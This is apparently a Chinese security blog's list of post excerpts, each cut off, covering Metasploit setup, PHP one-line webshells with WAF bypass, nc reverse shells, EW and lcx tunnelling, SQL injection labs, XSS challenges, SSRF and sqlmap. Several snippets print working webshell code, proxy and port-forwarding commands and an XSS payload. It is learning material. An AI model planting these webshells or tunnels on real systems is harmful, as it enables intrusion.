原创 Kali 新版本msfconsole啓動失敗問題

metasploit-framework安裝 1.一條代碼就可以安裝了 apt-get install metasploit-framework 2.安裝完成後,首先啓動postgresql數據庫: /etc/init.d/po

原创 apache服務器能夠使用php解析.phtml .php3

第一步、配置phpStudy版本 第二步,打開你的php配置文件 第三步、重啓phpStudy,去網頁搜索後綴爲.phtml以及.php3

原创 PHP一句話木馬及繞waf思路

PHP一句話木馬: 1 .eval(): <?php @eval($_POST['-7']); ?> eval函數將接受的字符串當做代碼執行。 2.assert(): <?php @assert ($_POST['-7'])

原创 利用nc反彈shell實驗

反彈shell 反彈shell(reverse shell),就是控制端監聽在某TCP/UDP端口,被控端發起請求到該端口,並將其命令行的輸入輸出轉到控制端。reverse shell與telnet,ssh等標準shell對應,本

原创 使用Earthworm (EW) 做Socks5代理

正向代理 1.選擇合適的ew文件(將文件ew_…改爲ew.exe,爲了在命令行少敲幾個字母),上傳到邊緣服務器 2.邊緣服務器輸入 ew.exe -s ssocksd -l 8000 3.可藉助proxifier工具配置攻擊機整

原创 mysql注入基礎練習

以sqli-labs-master作爲練習 初始:簡單獲取基礎內容 第一步,使用拼接的方式決定注入類型 第二步,使用order by確定有表單有幾列值 order by根據指定的列對結果集進行排序 在這裏插入圖片描述 第三步,使

原创 IP頭、TCP頭、UDP頭詳解

一、計算機網絡模型基礎 爲了方便講述計算機原理,通常將OIS與TCP/IP結合爲五層來講,如圖: 物理層:主要用來規定電氣特性的,必須按照標準使用哪些硬件。例如,調制解調器、PLC 、SONET/SDH 、G.709 、光導纖維

原创 lcx實現端口轉發

LCX轉發實驗一 環境:內網3389端口不對外開放,但是1234端口對外開放(正向連接) lcx .exe –tran 1234 127.0.0.1 3389 過程:192.168.1.105: 1234 -> 3389

原创 XSS Challenges部分題目總結

https://xss-quiz.int21h.jp 1.沒有過濾的xss <script>alert(document.domain);</script> 屬性中的xss 設置獨一無二的字符串如:“yyy”,方便查找值在代

原创 Burp Suite抓取安卓手機數據包(HTTPS)

1、電腦放熱點,然後用手機連接熱點。打開手機網絡設置,長按連接的無線網絡名稱,修改網絡。高級設置—代理—在服務器主機名輸入主機IP地址,端口設置8080。 2、設置Burp 監聽端口,可以選擇All interfaces,或者也可

原创 xss漏洞基礎

xss介紹 跨站腳本攻擊一-XSS (Cross Site Script),指的是攻擊者往Web頁面或者URL裏插入惡意JavaScript腳本代碼,如果Web應用程序對於用戶輸入的內容沒有過濾,那麼當正常用戶瀏覽該網頁的時候,嵌

原创 php通過pdo連接sql server數據庫

添加PHP對SQL SERVER的支持 1.新建PHP 文件,輸入內容: <?php echo phpinfo(); ?> 2.運行後,可以查看到如下數據: ① PHP 的版本是 5.6.27; ② 屬於線程非安全版; 3.在微

原创 php連接mongodb數據庫環境配置

第一步、選擇你的phpStudy版本 第二步、下載mongodb,選一個有5.6.27-nts版本的,下載跟Study版本一樣的x84或64位的 第三步、解壓並打開文件夾,找到php_mongodb.dll 第四步、將你的 php

原创 瞭解SSRF漏洞

Ssrf漏洞原理 ssrf形成的原因:很多web應用都提供了從其他的服務器上獲取數據的功能。使用用戶指定的URL,web應用可以獲取圖片,下載文件,讀取文件內容等。這個功能如果被惡意使用,可以利用存在缺陷的web應用作爲代理攻擊遠

原创 sql注入-sqlmap的使用方法

獲取一個url: http://localhost/sqli-labs-master/Less-1/?id=1 判斷是否有注入:python sqlmap.py –u “http://localhost/sqli-labs-mas